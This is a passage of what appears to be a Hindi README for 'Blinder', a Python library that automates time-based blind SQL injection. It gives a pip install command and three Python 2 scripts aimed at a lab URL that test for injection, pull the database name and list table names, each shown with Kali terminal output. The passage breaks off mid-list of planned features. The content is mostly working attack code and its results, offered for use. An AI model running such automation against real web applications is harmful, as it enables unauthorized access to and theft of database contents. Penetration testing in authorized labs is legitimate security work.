
टाइम-आधारित ब्लाइंड SQL इंजेक्शन को स्वचालित करने के लिए एक पायथन लाइब्रेरी
Blidner एक छोटी पायथन लाइब्रेरी है जो समय-आधारित ब्लाइंड SQL इंजेक्शन को स्वचालित करने के लिए पूर्व-निर्धारित क्वेरीज़ को फंक्शंस के रूप में उपयोग करके तीव्र PoC विकास को स्वचालित करती है।
आप निम्नलिखित कमांड का उपयोग करके Blinder स्थापित कर सकते हैं:
pip install blinder
या स्रोत डाउनलोड करके और इसे मैन्युअल रूप से अपने प्रोजेक्ट में आयात करके।
Blinder का उपयोग करने के लिए आपको Blinder मॉड्यूल आयात करना होगा, फिर Blinder के मुख्य फंक्शंस का उपयोग शुरू करें।
आप Blinder का उपयोग (वर्तमान संस्करण के साथ) निम्नलिखित कार्यों के लिए कर सकते हैं:
आप निम्नलिखित कोड का उपयोग करके URL में इंजेक्शन की जाँच कर सकते हैं:
#!/usr/bin/python
import Blinder
blind = Blinder.blinder(
"http://sqli-lab/sql_injection/index.php?search=3",
sleep=1
)
print blind.check_injection()
निष्पादन का परिणाम होगा:
root@kali:~/Desktop# python check.py
True
root@kali:~/Desktop#
आप निम्नलिखित कोड का उपयोग करके डेटाबेस का नाम प्राप्त कर सकते हैं:
#!/usr/bin/python
import Blinder
blind = Blinder.blinder(
"http://sqli-lab/sql_injection/index.php?search=3",
sleep=1
)
print "Database name is : %s " % blind.get_database()
और परिणाम होंगे:
root@kali:~/Desktop# python get-database.py
Database name is : db1
root@kali:~/Desktop#
तालिकाओं के नाम प्राप्त करने के लिए आप निम्नलिखित कोड का उपयोग कर सकते हैं:
#!/usr/bin/python
import Blinder
blind = Blinder.blinder(
"http://sqli-lab/sql_injection/index.php?search=3",
sleep=1
)
tables = blind.get_tables()
for table in tables:
print table
और परिणाम होंगे:
root@kali:~/Desktop# python get-tables.py
blogs
notes
root@kali:~/Desktop#
जल्द ही कई सुविधाएँ जोड़ी जानी चाहिए जैसे: